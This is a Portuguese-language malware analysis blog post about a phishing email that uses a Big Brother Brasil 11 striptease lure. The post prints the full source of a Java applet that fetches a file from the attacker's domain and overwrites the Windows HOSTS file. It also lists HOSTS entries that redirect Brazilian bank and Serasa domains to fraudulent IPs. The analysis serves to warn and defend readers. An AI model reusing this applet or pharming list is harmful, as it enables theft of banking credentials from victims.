Análise do Phishing: Vídeos BBB 11 Maria faz striptease

Como era de se esperar o programa BBB 11 virou engenharia social para phishing, é só um assunto entrar na mídia que os bankers e spamers já atualizam seus golpes buscando “fisgar” mais vítimas.

Está circulando um e-mail com os campos “De: BBB 11 <contato@oglobo.com>” e “Assunto: Maria faz strip e mostra tudo, veja sem censura!!!”.

Imagem abaixo:

Conforme é possível ver na foto, o e-mail possui um link para o site:

http://globo.videosbbb11.com

Vemos que foi registrado um domínio próprio só para aplicar o golpe, aliás um endereço bastante convincente. Ao clicar no link é aberto o site que tenta executar um Applet Java, o navegador Firefox apresentou uma mensagem de segurança dizendo que não foi possível verificar a assinatura digital do aplicativo.

Para os menos atentos talvez interprete essa mensagem como algo necessário para rodar o vídeo, o fraudador até colocou: “Para visualizar está página corretamente clique em RUN”.

Cliquei em Cancelar e visualizei o código-fonte da página:

Vemos que o site tenta executar o Applet WSD.jar, fiz o download do mesmo e não tive o trabalho nem de descompilar o .class, o .java já estava junto e possuía o seguinte código-fonte:

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.FilePermission;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.URL;
import java.nio.channels.FileChannel;

public class WSD extends Applet {
 private static final long serialVersionUID = 1L;

 public void start() {
  String url = getParameter("url"); 
  if (url != null) {
   String file = "c:/tmp/ip.txt";
   try {
    File pasta = new File("c:/tmp");
    pasta.mkdir();
    new FilePermission("c:/tmp/*", "write");
    download(url, file);
    copy(new File(file));
    pasta.delete();
    
    if(getParameter("email") != null){
     getAppletContext().showDocument(new URL(getParameter("email")), "_self");
    }
   } catch (Exception e) {
    e.printStackTrace();
   }
  }
 }
 
 private void download(String url, String file) throws Exception {
  BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
  PrintWriter p = new PrintWriter(file);
  
  String linha = null;   
  while((linha = br.readLine()) != null) {   
      p.println(linha);
  } 
  
  p.flush();
  p.close();
  br.close();
 }
 
 public void copy(File s) throws IOException {
  FileChannel in = (new FileInputStream(s)).getChannel();
  FileChannel out = (new FileOutputStream(new File("c:/windows/system32/drivers/etc/hosts"))).getChannel();
  in.transferTo(0, s.length(), out);
  in.close();
  out.close();
 }
}

Quando executado ele cria uma pasta temporária no computador da vítima, “c:/tmp/”, copia para ela o arquivo “ip.txt” fazendo download do arquivo pela URL:

http://www.videosbbb11.com/ip.txt

Depois ele copia o conteúdo do arquivo “c:/tmp/ip.txt” para o arquivo HOSTS do windows, localizado em "c:/windows/system32/drivers/etc/hosts". Por fim apaga a pasta temporária.

Interessante que após fazer isso ele realmente abre o vídeo verdadeiro do BBB, através dessa linha:

<param name="email" value="http://75.127.109.43/bbb11.php">

Essa página “bbb11.php” redireciona automaticamente para uma página verdadeira da globo.com que abre o vídeo em questão. Então quem clicou no e-mail para ver o vídeo e autorizou a execução do Applet Java no final realmente vai ver o vídeo, talvez nem perceba que tenha sido vítima de um golpe.

Para quem não conhece, o arquivo HOSTS é utilizado para forçar a resolução de domínio de um site para um determinado IP, o sistema operacional primeiro verifica o arquivo HOSTS para encontrar o IP do site, não encontrando nele busca no servidor DNS. Mais informações no site Linha Defensiva.

Afinal o que há no arquivo “ip.txt” que foi copiado para o HOSTS?

64.186.129.53 www.bradesco.com.br

64.186.129.53 bradesco.com.br

64.186.129.53 www.bancobradesco.com.br

64.186.129.53 bancobradesco.com.br

64.186.152.127 serasa.com.br

64.186.152.127 www.serasa.com.br

64.186.152.127 www.serasaexperian.com.br

64.186.152.127 serasaexperian.com.br

64.186.128.57 www.santander.com.br

64.186.128.57 santander.com.br

64.186.128.57 www.bancosantander.com.br

64.186.128.57 www.real.com.br

64.186.128.57 real.com.br

64.186.128.57 www.bancoreal.com.br

64.186.128.57 bancoreal.com.br

64.186.129.40 caixa.com.br

64.186.129.40 www.caixa.com.br

64.186.129.40 caixa.gov.br

64.186.129.40 www.caixa.gov.br

64.186.129.40 cef.com.br

64.186.129.40 www.cef.com.br

64.186.129.40 cef.gov.br

64.186.129.40 www.cef.gov.br

64.186.134.29 www.bb.comb.br

64.186.134.29 bb.com.br

64.186.134.29 www.bancodobrasil.com.br

64.186.134.29 bancodobrasil.com.br

64.186.134.29 www.bancobrasil.com.br

64.186.134.29 bancobrasil.com.br

64.186.134.29 www.bbrasil.com.br

64.186.134.29 bbrasil.com.br

Isso quer dizer que quando a vítima digitar essas URLs de sites bancários ela será redirecionada para esses IPs que hospedam páginas falsas dos bancos. Vejam algumas:

Bradesco

Serasa

Santander

Banco do Brasil

Cuidado, se você clicou nesse e-mail verifique seu arquivo HOSTS para ver se não foi alterado, se estiver alterado e você acessou algum desses sites bancários você pode ter sido vítima do golpe.

Leia mais análises de phishings e fraudes bancárias pela Internet.

Até a próxima!

Ronaldo Lima

crimesciberneticos.com | twitter.com/crimescibernet